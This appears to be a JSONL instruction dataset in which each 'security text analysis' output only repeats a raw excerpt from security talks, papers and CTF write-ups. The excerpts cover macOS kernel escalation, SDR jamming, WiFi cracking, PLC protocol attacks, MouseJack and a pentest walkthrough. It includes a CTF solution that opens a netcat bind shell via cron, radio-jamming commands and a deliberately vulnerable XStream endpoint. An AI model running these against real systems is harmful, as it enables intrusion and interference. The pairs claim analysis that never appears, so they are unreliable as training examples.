definitely not always the case, though. This Payphone. Elcotel Series 5 Line-Powered Payphone Internal Battery, trickle", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nmacOS 从运行库劫持到内核提权 周智 About  Senior Security Engineer of AntFinancial (Alipay) LightYear Security Labs  Product security and offensive security research  Acknowledged by Microsoft, Apple, Adobe and VMware for reporting security vulnerabilities  Conference speaking:  BlackHat USA 2017  HITB 2019  TyphoonCon 2019 PART 01 Attack Surface CONTENTS PART 02 Root Cause PART 03 Exploit PART 04 Mitigation 01 02 03 04 Why kernel exploit  To overcome or disable System Integrity Protection (Rootless)  File system protection (/System)  Attaching to Apple-signed processes  Enforced signature validation for KEXT  Deploy Rootkits  Gain more pwn points Motivation  General approach  attack kernel mode driver or XNU to control $pc, then disable SIP in kernel mode  Think outside the box  Is memory corruption always necessary?  Do the target have be the kernel itself or kernel mode drivers?  What about user space SIP bypass to gain kernel privilege? PART 01 An Attack Surface patch kextd (@osxreverser, Nov 2013) Custom build of kextload (@patrickwardle, BlackHat US 2015) Old days with kext_tools  Issue 676: Logic error when exec-ing suid binaries allows code execution as root on OS X/iOS (CVE-2015-3708)  Issue 353: OS X kextd bad path checking and toctou allow a regular user to load an unsigned kernel extension (CVE-2015-3709)  Issue 1520: MacOS double mach_port_deallocate in kextd due to failure to comply with MIG ownership rules (CVE-2018-4139)  Issue 676: Logic error when exec-ing suid binaries allows code execution as root on OS X/iOS (CVE-2015-3708) User mode only, logic  Issue 353: OS X kextd bad path checking and toctou allow a regular user to load an unsigned kernel extension (CVE-2015-3709) User mode only, logic  Issue 1520: MacOS double mach_port_deallocate in kextd due to failure to comply with MIG ownership rules (CVE-2018-4139) User mode only, MIG lifetime Arbitrary code execution in kextd == kernel code execution kextload kextd XNU Doesnt matter What makes kextd so special  I", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDigital Leviathan Nation-State Big Brothers (from huge to little ones) Eduardo Izycki & Rodrigo Colli Las Vegas, August 11th 2018 AGENDA INTRO SOURCES OUTCOMES CONCLUSION INTRO INTRO We should give our obedience to an unaccountable sovereign otherwise what awaits us is a state of nature that closely resembles civil war  a situation of universal insecurity. ? ! The claim Terrorism, cybercrime, foreign espionage, among other are examples that support politicians claims for increase state power over online life. Opposing evidence The current use of cyber offensive tools are aimed to political objectives rather than public safety Thomas Hobbes Espionage Surveillance / Eavesdropping Censorship Stealing of information and/or personal data (for achieving political purposes, i.e. opposition party, NGO, ethnic minorities) Untargeted violations of privacy (monitoring of behavior, activities, or other changing information of people online) Block specific applications or technologies; filtering and blocking of websites; manipulation of content or traffic manipulation; violations of user rights. INTRO 1 2 3 SOURCES APT Reports Leaks from spyware providers Acquisition of technology  Total of 758 reports/blog posts from vendors, NGO, CSIRT and universities,  The dataset has bias from a western perspective (close to 80%)  Two big providers of surveillance solutions Hacking Team and Gamma Group,  Data is available from multiple sources (Wikileaks has a good search platform)  Surveillance and/or intrusion technologies reported from multiple sources  Purchases made by different countries (potential cyber capabilities) SOURCES 1 2 3  Focus on attacks targeting NGO, political groups, media outlets, or opposition was considered as an indicator of state misbehavior  Many cases it was possible to identify who acquired it (law enforcement, military, intelligence, etc)  Buggedplanet.info and Surveillance Industry Index (SII) were helpful sources Censorship Transparency Reports  Freedom House", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n25 Years of Program Analysis Zardus Program Analysis Specification What should hold about the program? Technique How will we achieve the goal? Goal What do we want to achieve regarding the specification? Dawn of Computing 1830s 1842 1842 1947 Manual Program Analysis 1949 Alan Turing. \"Checking a large routine.\" EDSAC Inaugural Conference, 1949. Program Verification Given a program and a specification, show that the program conforms to the specification by creating a formal proof. int main() { unsigned int a, b, c; scanf(\"%d %d %d\", &a, &b, &c); if (a + b == c && c - b != a) crash(); } Specification: The program should not crash. int main() { unsigned int a, b, c; scanf(\"%d %d %d\", &a, &b, &c); if (a+b+c != 0 && pow(a, 3) + pow(b, 3) == pow(c, 3)) crash(); } Specification: The program should not crash. Program Testing Given a program and a specification, show that the program does not conform to the specification by providing a counterexample. int main() { unsigned int a, b, c; scanf(\"%d %d %d\", &a, &b, &c); if (a+b+c != 0 && pow(a, 2) + pow(b, 2) == pow(c, 2)) crash(); } Specification: The program should not crash. Counterexample: a == 3 b == 4 c == 5 1950s Program testing via \"Trash Decks\" http://secretsofconsulting.blogspot.com/2017/02/fuzz-testing-and-fuzz-history.html Specification What should hold about the program? Logical Properties Absence of Crashes Type Safety Efficiency Memory Safety Information Disclosure Authentication Technique How will we achieve the goal? Manual Symbolic Execution Abstract Interpretation Fuzzing Goal What do we want to achieve regarding the specification? Verification Testing Transformation Need for Automated Techniques 1952 Grace Hopper. \"The Education of a Computer.\" Proceedings of the 1952 ACM national meeting, 1952. Specification What should hold about the program? Logical Properties Absence of Crashes Type Safety Efficiency Memory Safety Information Disclosure Authentication Technique How will we achieve the goal? Manual Symboli", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nimport os,random,sys,string from hashlib import sha256 import SocketServer import CompactFIPS202 from flag import FLAG class Task(SocketServer.BaseRequestHandler): def proof_of_work(self): proof = ''.join([random.choice(string.ascii_letters+string.digits) for _ in xrange(20)]) digest = sha256(proof).hexdigest() self.request.send(\"sha256(XXXX+%s) == %s\\n\" % (proof[4:],digest)) self.request.send('Give me XXXX:') x = self.request.recv(10) x = x.strip() if len(x) != 4 or sha256(x+proof[4:]).hexdigest() != digest: return False return True def recvhex(self, sz): try: r = sz res = '' while r>0: res += self.request.recv(r) if res.endswith('\\n'): r = 0 else: r = sz - len(res) res = res.strip() res = res.decode('hex') except: res = '' return res def dosend(self, msg): try: self.request.sendall(msg) except: pass def dohash(self, msg): return CompactFIPS202.Keccak(1552, 48, bytearray(msg), 0x06, 32) def handle(self): if not self.proof_of_work(): return self.request.settimeout(3) self.dosend(\"first message(hex): \") msg0 = self.recvhex(8000) self.dosend(\"second message(hex): \") msg1 = self.recvhex(8000) if msg0!=msg1 and self.dohash(msg0) == self.dohash(msg1): self.dosend(\"%s\\n\" % FLAG) else: self.dosend(\">.<\\n\") self.request.close() class ForkingServer(SocketServer.ForkingTCPServer, SocketServer.TCPServer): pass if __name__ == \"__main__\": HOST, PORT = '0.0.0.0', 10001 print HOST print PORT server = ForkingServer((HOST, PORT), Task) server.allow_reuse_address = True server.serve_forever()", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n数据安全能力建设实施指南 V1.0 (征求意见稿) ! ! ! ! ! ! ! ! ! ! ! ! ! 数据安全能力成熟度模型(DSMM)配套文档 2018-9-29! ! ! ! 2! 目 录 前 言 ................................................................................ 3! 1 范围 ................................................................................ 4! 2 规范性引用文件 ...................................................................... 4! 3 术语和定义 .......................................................................... 4! 4 缩略语 .............................................................................. 5! 5 数据安全能力建设框架 ................................................................ 5! 5.1 数据安全与现有安全体系融合 ...................................................... 5! 5.2 数据安全能力建设框架 ............................................................ 5! 5.3 能力建设框架图说明 .............................................................. 6! 6 数据安全组织建设 .................................................................... 7! 6.1 组织架构设计 .................................................................... 7! 6.2 协同部门数据安全职能 ............................................................ 9! 7 数据安全人员能力 ................................................................... 11! 7.1 数据安全管理能力 ............................................................... 11! 7.2 数据安全运营能力 ............................................................... 12! 7.3 数据安全技术能力 ............................................................... 12! 7.4 数据安全合规能力 ............................................................... 13! 7.5 人员能力与组织架构的映射 ....................................................... 13! 8 数据安全制度流程 ................................................................... 14! 8.1 制度体系架构设计 ............................................................... 14! 8.2 制度体系架构说明 ............................................................... 16! 9 数据安全技术工具 ................................................................... 17! 9.1 技术工具架构设计 ............................................................... 17! 9.2 技术工具架构说明 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Android Dynamic Analysis 传送门[門](https://github.com/secmobi/wiki.secmobi.com/) [四个参数搞定安卓驱动fuzzing](http://www.freebuf.com/tools/92638.html) [DIVA Android - Damn Insecure and vulnerable App for Android](https://github.com/payatu/diva-android/) [2016年Android手机平台最佳黑客应用汇总](http://www.easyaq.org/info/infoLink?id=1848639717) [移动安全之Android安全检测工具大全](https://www.92aq.com/2016/01/26/android-app-sec-tools.html) [2016 黑客必备的Android应用](http://www.freebuf.com/tools/95020.html) [ADBI - Android Native 层动态二进制插桩工具](https://github.com/samsung/adbi) [ARTDroid: Simple and easy to use library to intercept virtual-method calls under the Android ART runtime.](https://github.com/vaioco/art-hooking-vtable) [Drozer 新增了一个用于 Fuzz Android 应用的脚本](https://github.com/mwrlabs/drozer-modules/blob/master/intents/fuzzinozer.py) [360加固静态脱壳](http://bbs.pediy.com/showthread.php?t=207856) [Marvin: 一个用于在 Android APP 中寻找 Bugs 的系统支持动静态分析](https://github.com/programa-stic/marvin-django) [apkr高级andorid恶意软件分析工具](https://github.com/zerjioang/apkr) [新手教程如何使用Burpsuite抓取手机APP的HTTPS数据](http://www.freebuf.com/articles/terminal/113940.html) [Android逆向之旅静态方式破解微信获取聊天记录和通讯录信息](http://blog.csdn.net/jiangwei0910410003/article/details/52238891) [Android Webview 远程代码执行之GetClassLoader分析](http://www.droidsec.cn/android-webview-%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E4%B9%8Bgetclassloader) [如何在暗网中收集公开情报资源上集利用OnionScan搭建属于自己的暗网搜索引擎](http://bobao.360.cn/learning/detail/2952.html) [如何在暗网中收集公开情报资源下集PythonShodanSSH密钥](http://bobao.360.cn/learning/detail/2955.html) [26款优秀的Android逆向工程工具](http://www.freebuf.com/sectool/111532.html) [Android系统篇之----免root实现Hook系统服务拦截方法](http://blog.csdn.net/jiangwei0910410003/article/details/52523679) [CuckooDroid - Android 恶意软件自动化分析框架](http://www.darknet.org.uk/2016/08/cuckoodroid-automated-android-malware-analysis/) [JEB 2.0.6.201508252211 破解版](http://www.52pojie.cn/thread-518338-1-1.html) [TaintART -通过修改编译器(dex2oat)来实现数据流分析的系统](http://securitygossip.com/blog/2016/09/27/2016-09-27) [用 A", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIntercepting, modifying, and generating wireless signals with SDR Caleb Madrigal (Public) handle: metem Website: http://calebmadrigal.com/ Twitter: @caleb_madrigal Ham call sign: w0hak About Caleb: Programming for about 18 years. I most enjoy hacking and mathy stuff (Signal processing, Machine Learning, AI) In general, I find it interesting to hear the \"unhearable\", see the \"unseeable\" - to tune in to the subtleties around us. In the computer world, everything is black and white, but the real world is fuzzy and colorful. Ontologically, I think the best way to describe myself is as a \"Christian Mystic\". I also love Art - Literature, Music, Artsy movies, etc. I'm also an occasional and unaccomplished poet. Possible titles for this talk: Intercepting, modifying, and generating wireless signals with SDR How digital data is transmitted wirelessly Controlling wireless IoT devices via crafted radio signals How the OSI Physical layer works and how to attack it Background on what led me to doing this stuff - came in from 3 directions: IoT Music theory -> Sound analysis Wireless hacking We'll be exploring the Physical layer Harness the invisible energy all around us! IoT: +5000% attack damage to all wireless hacking skills Things that work through radio: \"Radio\" (AM, FM) TV Cell phones Wifi Bluetooth GPS Wireless security systems Any form of Wireless IoT device SCADA systems / large industrial equipment Software-Defined Radio (SDR) HackRF One LimeSDR RTL-SDR In the Wizard/Sorceress metaphor, this is your wand (along with the antenna, of course). Sidenote: when using radios, your body can actually become a part of the antenna, which is very like magical lore - THE ENERGY IS FLOWING THROUGH YOU! Demos Unlocking Car (video) https://www.youtube.com/watch?v=Q-OlgVLHIDs Jamming (live) ./jam_narrow.py 440440000 Controlling outlet (live) python3 ask_modulate_radio_signal.py -c raw_data/outlet_c2_on.json -o /tmp/radio_signal.pcm ./transmit_signal.py -f /tmp/radio_signal.pcm -t 315000000 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Episode 2: Challenge 3 ## Description > Welcome to the shell. See if you can leave. socat FILE:`tty`,raw,echo=0 TCP:quarantine-shell.h4ck.ctfcompetition.com:1337 > > Hint: How can you ask the shell for which commands are available? ## Solution Let's connect to the server: ```console (user@kali)-[/media/sf_CTFs/h4ck1ng.google/EP002/Challenge_03] $ socat FILE:`tty`,raw,echo=0 TCP:quarantine-shell.h4ck.ctfcompetition.com:1337 == proof-of-work: disabled == bash: cannot set terminal process group (1): Inappropriate ioctl for device bash: no job control in this shell ___ _ _ ____ _ _ _ / _ \\ _ _ __ _ _ __ __ _ _ __ | |_ (_) _ __ ___ / ___| | |__ ___ | || | | | | || | | | / _` || `__|/ _` || `_ \\ | __|| || `_ \\ / _ \\ \\___ \\ | `_ \\ / _ \\| || | | |_| || |_| || (_| || | | (_| || | | || |_ | || | | || __/ ___) || | | || __/| || | \\__\\_\\ \\__,_| \\__,_||_| \\__,_||_| |_| \\__||_||_| |_| \\___| |____/ |_| |_| \\___||_||_| The D&R team has detected some suspicious activity on your account and has quarantined you while they investigate 942 days stuck at ~ ~ $ ls command blocked: ls check completions to see available commands ~ $ echo Test command blocked: echo Test check completions to see available commands ~ $ pwd command blocked: pwd check completions to see available commands ~ $ ``` Looks like a restricted shell with many blocked commands. As suggested, we'll try the completions to see the available commands: ```console check completions to see available commands ~ $ ! enable quarantine_protocol . esac read : eval readarray [ exec readonly [[ exit return ]] export select _dnr_toolkit false set alias fc shift bg fg shopt bind fi source break for suspend builtin function test caller getopts then case hash time cd help times command history trap compgen if true complete in type compopt jobs typeset continue kill ulimit coproc let umask declare local unalias dirs logout unset disown mapfile until do popd wait done printf while echo pushd { elif pwd } else quarantine ``` Well, actuall", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\npackage org.vulhub.xstreamsample; import com.thoughtworks.xstream.XStream; import org.springframework.web.bind.annotation.*; @RestController public class HelloController { @GetMapping(value = \"/\") public String hello() { return \"hello, input your information please.\"; } @PostMapping(value = \"/\") public String read(@RequestBody String data) { XStream xs = new XStream(); xs.processAnnotations(User.class); User user = (User) xs.fromXML(data); return \"My name is \" + user.getName() + \", I am \" + user.getAge().toString() + \" years old.\"; } }", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n\"Hacking Web Apps\"  Brent White / @brentwdesign Abstract: Understanding how to exploit vulnerabilities within a web application is beneficial to both breakers and fixers. It is a core skill for penetration testers, and it provides significant insight into secure coding practices for developers. This talk covers all aspects of executing a web application penetration test. We will start with the discovery phase utilizing OSINT sources; such as, search engines, sub-domain brute-forcing and other methods to help you get a good idea of targets \"footprint\", all the way to fuzzing parameters to find potential SQL injection vulnerabilities. I will also discuss several of the tools and techniques that I commonly use. After this talk, you should have a good understanding of what is needed to break into web applications like a professional. Detailed Outline: Before you can start tearing into a web application for a customer, there are a few things that need to happen. There are rules and goals that need to be established for the assessment. This generally happens during the scoping and kick-off discussions. Since scoping and contracts make me sleepy, I will omit the details. The kick-off call is where the rubber starts hitting the road, and exists to bridge the gap between the legal contract and the final report using the Rules of Engagement document, also known as the RoE. The RoE answers the questions of who, when and what and identifies the boundaries between what is and is not allowed during the actual assessment. After the contents of this document have been agreed upon, you are good to go on executing the assessment. === Evidence Gathering === At the end of every assessment, a report is expected. The more evidence you collect and the better its organized can really help shorten the time it takes to write the report as well as improve upon the value of it. Before I start anything, I set up documents to keep evidence, notes and progress. Here are a few tips:  KeepNote is m", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n大力出奇迹の WiFi Hacking 杨 哲 (Longas) ZerOne无线安全研究组织 ZerOne WirelessSec Research SDR LTE-FDD RFID WiFi 干扰 GSM APPLICATION SPEED INTERNET 能源 BLUETOOTH ZigBee OpenBSC 轨道交通 RESOURCE LTE-FDD Wireless GPS Infrared NO 教育行业 车联网 GSM-R LTE-HDD 民航 OpenBTS 电力行业 NFC 卫星通信 无线电 HackRF 交通 物联网 有源RFID SOCIAL 无线电 BLOG 干扰 医疗 APPLICATION SPEED INTERNET NEWS SECRET HackRF 移动互联网 轨道交通 RESOURCE Wireless GPS Infrared YES NO 教育行业 车联网 GSM-R LTE-HDD 民航 OpenBTS 电力行业 NFC 卫星通信 无线电 运营商 交通 物联网 有源RFID IOT BLOG 卫星通信 干扰 INTERNET 能源 NO TELEVISION TIME IOT CLOCK DIGITAL ADVERT SMART PHONE EDUCATION TALENT PHONE LTE-FDD 干扰 SPEED INTERNET 能源 Infrared 教育行业 GSM-R 卫星通信 物联网 干扰 医疗 SPEED INTERNET 能源 GPS Infrared YES NO 教育行业 车联网 GSM-R LTE-HDD 电力行业 交通 物联网 有源RFID IOT TALENT Wireless CLOCK YES NO 车联网 NFC 有源RFID BLOG 卫星通信 无线电 干扰 INTERNET DIGITAL INFORMATION SECRET 铁路 KNOWLEDGE LTE-FDD 干扰 SPEED INTERNET 能源 Infrared 教育行业 GSM-R 卫星通信 物联网 干扰 医疗 SPEED INTERNET 能源 GPS Infrared YES NO DEVELOPMENT 车联网 GSM-R LTE-HDD 电力行业 交通 物联网 有源RFID IOT TALENT Wireless CLOCK YES NO 车联网 NFC 有源RFID BLOG 卫星通信 无线电 干扰 INTERNET DIGITAL INFORMATION SECRET 铁路 KNOWLEDGE LTE-FDD 教育行业 GSM-R TALENT Wireless CLOCK YES NO 车联网 NFC 有源RFID BLOG 卫星通信 无线电 干扰 INTERNET DIGITAL INFORMATION SECRET INTERNET 车联网 交通 LTE-FDD LANGUAGE INTERFACE HackRF  Crack WPA  Pentest over WiFi  Fake AP  Air-Capture  MITM  WAP Tunnel  WAPJack  WIDS / WIPS/Hotspot  Deauth/Auth/Disco  WiFiphisher 12只 猴子 空口监听 FakeAP 内网渗透 WAPJack MITM Deauth 85% 案例 聚焦 我去 WPA 密码 !!!!!  Dictionary  WPA PMK Hash  WPS Online / Offline  Distributed  GPU  Cloud Crack #主流 用户 云平台 运算节点 运算结果返回 上传 握手包 指派 任务 {反物质}无线安全评估云平台 新平台 发布 初始 界面 300 40,000,000,000,000 组合 3,000 样本 日夜 3 公测 几个 数字 TEXTTEXT 6666688888 APPLICATION SPEED windgame susan1003 8888899999 a=b?c:d; 110110110 wang1104 wine888999 46958820 34238817 ECONOMIC 19830405 12345679 123454321 TOWERFUL 46958820 GREENLEAF FOLLOWME zxcvbnm67989989 52331314 11759000 wangkang 62518915 62518913 xa_123456! 1234554321 zhangjianguo 82729336 87654321 88776655 TEXT RISK APPLICATIO", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n任意文件下载击溃跳板站点 这次的实战渗透过程信息收集是很重要的一个阶段尽可能收集目标网站或目标主机尽量多的信 息信息收集的方式 主动信息收集是通过直接访问网站主动获取信息对IP开放的端口CMS中间件敏感目 录敏感文件脚本类型JS里的域名操作系统扫描分析 被动信息收集是基于公开的渠道在不与目标系统直接交互的情况下获取信息比如搜索引擎 获取网站的URI获取IP绑定的域名C段域名whois信息证书对应的其他资产做扩展信息收 集 常用的几个小技巧 1利用windows和linux区分大小写的区别在访问的时候尝试把路径部分改成大写 https://www.aaa.com/upload/index.php改成www.aaa.com/upload/index.PHP 页面路径还正常访问就是Windows系统报错就是Linux系统 因为Windows系统对文件名称大小写不敏感而Linux对文件名称大小写会有区分 2chrome的F12扩展查看网络 > header > Server部分例如Server: nginx/1.20.1可以知道是 nginx 3判断网站是php Jsp Asp Aspx可以根据网站URL来判断也可以利用google语法辅助 判断site:XXX filetype:asp|php|jsp|jspx|aspx 端口扫描 HTTP端口快速扫描使用masscan扫描nmap服务识别常见端口 21:\"FTP\", 22:\"ssh\", 25:\"SMTP\", 80:\"web\", 139:\"Samba\", 143:\"IMAP\", 161:\"SNMP\", 389:\"Ldap目录访问协议\", 443:\"https\", 445:\"Microsoft SMB\", 465:\"SMTP SSL\", 513:\"rlogin\", 546:\"DHCP failover\", 873:\"rsync\", 993:\"IMAPS\", 1080:\"socks proxy\", 1194:\"OpenVPN\", 1352:\"Lotus domino\", 1433:\"MSSQL\", 1521:\"Oracle default\", 2049:\"Nfs\", 2181:\"ZooKeeper\", 2375:\"Docker\", 3306:\"MySQL\", 3389:\"Remote Desktop\", 4440:\"rundeck\", 4848:\"GlassFish控制台\", 5000:\"SysBase/DB2\", 5432:\"PostgreSQL\", 5632:\"pcanywhere\", 5900:\"vnc\", 5984:\"Apache CouchDB\", 6082:\"varnish\", 6984:\"Apache CouchDB SSL\", 6379:\"Redis\", 7001:\"weblogic_Server isten port\", 7002:\"Server Listen SSL Port\", 8069:\"zabbix\", 8080:\"web,jboss,tomcat etc..\", 8089:\"Jboss/Tomcat/Resin\", 8083:\"influxDB Web admin\", 8086:\"influxdb HTTP API\", 8095:\"Atlassian Crowd\", 8161:\"activemq\", 8888:\"Jupyter Notebook\", 8983:\"solr\", 9000:\"fastcgi\", 9043:\"VMware ESXI vsphere\", 9080:\"websphere http\", 9083:\"Hive default\", 9090:\"websphere admin\", 9200:\"Elsaticsearch http\", 9300:\"Elsaticsearch Node1\", 10000:\"HiveServer2\", 11211:\"memcached\", 27017:\"MongoDB\", 28017:\"MongoDB web page\" 50000:\"SAP command excute\", 50060:\"hadoop web\", 50070:\"hadoop default\", 60000:\"HBase Master\", 60010:\"hbase.master.info.bindAddress\", 任意文件下载 敏感信息主要是后台目录备份文件上传目录路径安装页面以及信息泄露phpinfo文件管理 组件phpmyadmin相关的信息搜集敏感信息借助google搜索引擎的hacking语法能搜索很多有 用的线索 这次实操是在一个asp页面里发现了PDF文件下载然后改成相对路径可以下载任意ASP文件 目录扫描得到管理员后台URI admin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe spear to break the security wall of S7CommPlus Cheng Lei, Li Donghong, Ma Liang NS-Focus Abstract. Siemens PLCs was widely used in industrial control system(ICS). The new version of Siemens PLCs like S7-1500 and S7-1200v4.0 used an encrypted protocol names S7CommPlus to prevent replay attacks. In this paper, based on reverse debugging techniques, we will demonstrate the encryption algorithms of S7CommPlus and program a MFC to control the Siemens PLC. Finally, some more security protective measures have been proposed according to our research. 1. Introduction. Industrial Control System involves national level critical infrastructure and requires highly Security. In the past few years, attacks against industrial control systems (ICS) have increased year over year. Stuxnet in 2010 exploited the insecurity of the S7Comm protocol, the communication protocol used between Siemens Simatic S7 PLCs to cause serious damage in nuclear power facilities. After the exposure of Stuxnet, Siemens has implemented some security reinforcements into the S7Comm protocol. The current S7CommPlus protocol implementing encryption has been used in S7-1200 V4.0 and above, as well as S7-1500, to prevent attackers from controlling and damaging the PLC devices. Is the current S7CommPlus a real high security protocol? This talk will demonstrate a spear that can break the security wall of the S7CommPlus protocol. First, we use software like Wireshark to analyze the communications between the Siemens TIA Portal and PLC devices. Then, using reverse debugging software like WinDbg and IDA we can break the encryption in the S7CommPlus protocol. Finally, we write a MFC program which can control the start and the stop of the PLC, as well as value changes of PLCs digital and analog inputs & outputs. This paper is based on the Siemens SIMATIC S7-1200v4.1. 2. Related Work At Black Hat USA 2011, Dillon Beresford demonstrated how to use reconnaissance, fingerprinting, replay attacks, authentication bypass m", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMouseJack and Beyond: Keystroke Sniffing and Injection Vulnerabilities in 2.4GHz Wireless Mice and Keyboards Marc Newlin marc@bastille.net @marcnewlin July 8, 2016 v0.1 Abstract What if your wireless mouse or keyboard was an eective attack vector? Research reveals this to be the case for non-Bluetooth wireless mice and keyboards from Logitech, Microsoft, Dell, Lenovo, Hewlett-Packard, Gigabyte, Amazon, Toshiba, GE, Anker, RadioShack, Kensington, EagleTec, Insignia, ShhhMouse, and HDE. A total of 16 vulnerabilities were identified and disclosed to the aected vendors per our disclosure pol- icy[1]. The vulnerabilities enable keystroke sniffing, keystroke injection, forced device pairing, malicious macro programming, and denial of service. This document details the research process and results, reproduction steps for each vulnerability, vendor timelines and responses, and mitigation options where available. Most of the aected vendors are still in the disclosure period at the time of this writing, and as such, vendor responses are not included in this document. An updated white paper and accompanying slide deck with vendor response and mitigation details will be available when this material is presented at DEF CON. 1 Contents 1 Introduction 4 2 Overview of Vulnerabilities 4 3 Transceivers 5 3.1 Nordic Semiconductor nRF24L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 3.2 Texas Instruments CC254X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 3.3 MOSART Semiconductor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 3.4 Signia SGN6210 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 3.5 GE Mystery Transceiver . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 4 Research Process 7 4.1 Software Defined Radio . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Level03 #### About Check the home directory of flag03 and take note of the files there. There is a crontab that is called every couple of minutes. To do this level, log in as the level03 account with the password level03. Files for this level can be found in /home/flag03. #### Source code There is no source code available for this level ``` cat /home/flag03/writeable.sh #!/bin/sh for i in /home/flag03/writeable.d/* ; do (ulimit -t 5; bash -x \"$i\") rm -f \"$i\" done ``` #### Solutions ``` level03@nebula:~$ cat ./test.sh #!/bin/sh /bin/getflag >> /tmp/a.out level03@nebula:~$ cat ./test1.sh #!/bin/sh nc.traditional -v -e /bin/sh -l -p 4444 root@nebula:~#: ls /var/spool/cron/crontabs flag03 root ``` #### Recommend Linux 计划任务/日志/优先级 * 一次性定时任务 at, batch, atq, atrm atd ----> at ---- /var/spool/cron/atjobs ---- /var/spool/cron/atspool ---- /proc/loadavg ---- /var/run/utmp ---- /etc/at.allow ---- /etc/at.deny * 循环定时任务 cron ---- crontab ---- /etc/crontab ---- /etc/cron.allow ---- /etc/cron.deny ---- /var/spool/cron/crontabs/* ---- /etc/rc.local ``` level03@nebula:~$ cat /etc/rc.local #!/bin/bash start-stop-daemon -b -c flag12 -S /home/flag12/flag12.lua -x `which lua` start-stop-daemon -b -c flag17 -S /home/flag17/flag17.py -x `which python` /usr/sbin/thttpd -C /home/flag07/thttpd.conf /usr/sbin/thttpd -C /home/flag16/thttpd.conf * * * * * command to be executed - - - - - | | | | | | | | | ----- Day of week (0 - 7) (Sunday=0 or 7) | | | ------- Month (1 - 12) | | --------- Day of month (1 - 31) | ----------- Hour (0 - 23) ------------- Minute (0 - 59) * ---- 代表任何时刻  ---- 1510 代表第1第5第10 - ---- 1-24代表1到24 /n ---- 间隔为n ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nipcalc === 简单的IP地址计算器 ## 补充说明 **ipcalc命令** 是一个简单的ip地址计算器可以完成简单的IP地址计算任务 ### 语法 ```shell ipcalc(选项) ``` ### 选项 ```shell -b由给定的IP地址和网络掩码计算出广播地址 -h显示给定UP地址所对应的主机名 -m由给定的IP地址计算器网络掩码 -p显示给定的掩码或IP地址的前缀 -n由给定的IP地址和网络掩码计算网络地址 -s安静模式 --help显示帮助信息 ``` ### 实例 ```shell [root@localhost ~]# ipcalc -p 192.168.2.1 255.255.255.0 PREFIX=24 [root@localhost ~]# ipcalc -n 192.168.2.1 255.255.255.0 NETWORK=192.168.2.0 [root@localhost ~]# ipcalc -h 127.0.0.1 hostname=localhost.localdomain [root@localhost ~]# ipcalc -m 192.168.2.1 NETMASK=255.255.255.0 [root@localhost ~]# ipcalc -pnbm 192.168.2.1 255.255.255.0 NETMASK=255.255.255.0 PREFIX=24 BROADCAST=192.168.2.255 NETWORK=192.168.2.0 ```", "category": "text_analysis", "source": "security_papers"}
